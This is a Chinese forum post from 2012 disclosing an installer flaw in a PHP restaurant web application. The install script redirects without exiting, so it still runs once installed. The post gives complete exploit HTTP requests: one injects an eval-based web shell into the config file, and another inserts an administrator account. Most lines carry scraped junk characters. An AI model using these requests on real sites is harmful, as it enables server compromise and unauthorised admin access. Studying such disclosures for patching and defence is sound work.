问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。% d1 y. w: f# p. k
- u& T) M; Q- l2 G<?php
3 A6 v k- }4 S- h6 ~/ Cif(file_exists("../install.lock")). r# j4 O& H# p* }* ^+ y R
{0 S% t) p8 R! I9 i- r3 K
header("Location: ../");//没有退出
) w' r3 }: y) p' U R% U}9 ^& z/ p# S; a3 c
& k+ u7 ~9 S3 v9 U. e/ @6 V
//echo 'tst';exit;1 C: u0 O/ [% e2 v! c
require_once("init.php");( |9 k# U( v' B5 A9 c9 j
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)+ D$ S6 f$ j. d! Y" P, j
{
# ^. k( e0 t7 o5 ^可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
) q0 Y8 U e3 X/ q* d
6 y& B% P; F6 O- f0 E8 a5 O1、getshell(很危险)
5 A( f2 Z5 N( r$ [/ ?9 Mif(empty($_REQUEST['step']) || $_REQUEST['step']==1)# l L/ o6 f4 k
{
. h8 A0 S0 y5 D0 D+ O( d1 H# ~$smarty->assign("step",1);
" f1 l% h* o6 ]) _7 e1 \# {3 e$smarty->display("index.html");8 O: T2 C N" z8 }, }) O4 H; c
}elseif($_REQUEST['step']==2)4 n! @7 z. E1 F# @$ t$ z
{
% a; k6 k( u- f- S. [; |! q $mysql_host=trim($_POST['mysql_host']);( i7 C' D" [# u3 ]" L# q, J# b7 O
$mysql_user=trim($_POST['mysql_user']); m& w* V' c6 o8 C: S+ t
$mysql_pwd=trim($_POST['mysql_pwd']);
: T9 m D/ H/ Q. z2 J* v/ r/ ?8 C3 y $mysql_db=trim($_POST['mysql_db']);
' |+ z2 r7 g F# _2 N $tblpre=trim($_POST['tblpre']);
' Y% E8 X- ?$ `6 d9 A $domain==trim($_POST['domain']);, x1 Q9 N6 Y- [ f \$ K
$str="<?php \r\n";
4 v$ }4 @2 D) K8 M $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";; a7 U* q: H+ }* e5 [
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";7 r: |) t8 A" _' S- U" P, \
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
0 [! q, v6 v- i( l* `! P, v $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";- D5 o" L* j" E2 a8 S
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
# h& Y2 U X' r $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";3 v2 P2 L7 a% a U d
$str.='define("DOMAIN","'.$domain.'");'."\r\n";
% j5 L9 ~% L9 V# l $str.='define("SKINS","default");'."\r\n";
& f; M- g9 ^1 [: a- g; I- _" l $str.='?>';
$ o4 q/ W. Q8 j0 b2 \ file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
# P6 M( y& k( O2 n) Q上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
) G: q4 i. y6 d( U+ `" APOST /canting/install/index.php?m=index&step=2 HTTP/1.1
# s8 s4 m7 Z4 A0 Z+ L0 ` F$ CHost: 192.168.80.129' f: M/ A: M5 P* `7 V# ]+ T0 d+ F' O0 k. S
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0. ]* F& B/ H' [ } }/ S- {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
* b0 d3 ?8 i" W: b' kAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.33 E& b# z) e4 X
Accept-Encoding: gzip, deflate, o4 Y* ^: W1 Y% W6 v
Referer: http://192.168.80.129/canting/install/index.php?step=1
& A, d" l) w. W jCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
0 q4 H3 u$ {& c, p" `0 o; SContent-Type: application/x-www-form-urlencoded
4 s1 ?8 Z4 k4 j# j T( rContent-Length: 126/ U. I9 G: W! v9 w# B( f
h1 V, P9 T3 Y
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
9 L) @ i" S5 k. V: e( P但是这个方法很危险,将导致网站无法运行。
" d) _. |+ Y4 t2 j% G4 y, v! }, t/ m/ W7 Q
2、直接添加管理员. J( L4 X; ]1 z7 x+ P3 \8 K J
* b2 f- U4 [, s) [$ Xelseif($_REQUEST['step']==5)2 N% h3 _* {3 t: N/ `
{
. X+ Y! {8 A/ D( P if($_POST)
4 [1 T$ x4 J* \, ?9 H# H! B( f { require_once("../config/config.inc.php");
6 G# U, d- X- K6 p5 S7 W $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
* T7 D! l$ a3 r( E1 @: q+ i0 h mysql_select_db(MYSQL_DB,$link);. @& H, f$ S9 {5 L( u4 Q2 q
mysql_query("SET NAMES ".MYSQL_CHARSET );
3 D. J) t, x6 f. f mysql_query("SET sql_mode=''");
. A5 P, e6 e8 A0 f& f9 L" T% D$ j. L
8 Y( Z. X5 }, F' W* s $adminname=trim($_POST['adminname']);
* O1 y9 K( p# o! g $pwd1=trim($_POST['pwd1']);
; l% u% d2 y" ]* X $pwd2=trim($_POST['pwd2']);
- b. w3 A, l3 k+ ]( S7 i if(empty($adminname))& G e# I: P: L8 `( h
{
$ a' f- Q% E3 \( D; X0 Y/ [& D* `; t" g
echo "<script>alert('管理员不能为空');history.go(-1);</script>";
& [# P0 d7 n( x$ [- J0 e" o6 C: Y exit();, P- }1 L/ g5 `- Y
}4 G: H4 x) l C* X& j5 o# Q7 I
if(($pwd1!=$pwd2) or empty($pwd1))# Y2 P+ j$ q; p
{
" a; [/ }9 O2 T$ w9 {: S echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出, ^+ W2 m- h& e5 m2 |# R( U
}
2 K& L# N+ {) a, Q mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
2 y. H4 s- r- x' ]- [* x; _( m) ~ }
; d* |0 c& ~4 q9 j这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
7 _5 G; Y; d t: ]2 A' N9 M& XPOST /canting/install/index.php?m=index&step=5 HTTP/1.1
- C- }, G+ \3 |7 n# a jHost: 192.168.80.129" l+ j- M- ^1 S' f. ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
6 L" t5 c% b0 R& R/ `' }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
% E3 f% T. n8 @ Y5 n: sAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3% h# ^# M4 e3 Z" s( p! d }* ~
Accept-Encoding: gzip, deflate
9 _3 t, J5 @6 c5 FReferer: http://www.2cto.com /canting/install/index.php?step=10 I& C0 l4 O4 V1 k0 v" T5 Q% [* B
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc428 F# `2 [! c& a
Content-Type: application/x-www-form-urlencoded2 N" }; X" K. j
Content-Length: 46
9 M7 F/ v0 {. \: n # n& b+ L( d" h4 s, |
adminname=qingshen&pwd1=qingshen&pwd2=qingshen! V, ^2 X9 Z9 ?( u: k8 Y7 _4 w
|
发表于 2012-12-4 11:13:44
收藏
支持
反对